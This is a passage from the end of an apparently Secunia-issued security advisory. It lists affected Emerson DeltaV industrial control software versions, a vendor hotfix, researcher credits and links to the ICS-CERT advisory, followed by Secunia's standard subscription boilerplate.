reported in the following applications: * DeltaV and DeltaV Workstations versions 9.3.1, 10.3.1, 11.3, and 11.3.1 * DeltaV ProEssentials Scientific Graph version 5.0.0.6 SOLUTION: Apply hotfix (please contact the vendor for more information). PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Kuang-Chun Hung, Security Research and Service Institute. ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-137-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------